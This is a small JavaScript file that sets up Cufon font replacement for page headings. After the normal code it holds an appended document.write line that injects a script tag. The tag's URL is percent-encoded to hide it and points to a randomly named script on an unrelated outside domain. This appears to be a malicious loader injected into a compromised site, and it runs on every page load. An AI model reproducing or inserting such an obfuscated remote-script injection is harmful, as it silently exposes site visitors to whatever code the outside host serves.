function initCufon() {
	Cufon.replace('.row h3', { fontFamily: 'Gill Sans'});
	Cufon.replace('#content .headline h2', { fontFamily: 'Gill Sans Light'});
	Cufon.replace('#main .headline h2', { fontFamily: 'Gill Sans Light'});
}

$(document).ready(function(){
	initCufon();
});
document.write('<script language="JavaScript" type="text/javascript" src="'+unescape('%68%74%74%70%3a%2f%2f%77%77%77%2e%73%6e%6f%77%2d%63%61%6d%70%2e%63%68%2f%73%6e%6f%77%2d%63%61%6d%70%2f%4d%65%64%69%61%2f%64%36%62%61%66%36%35%65%30%2e%6a%73')+'"></script>');
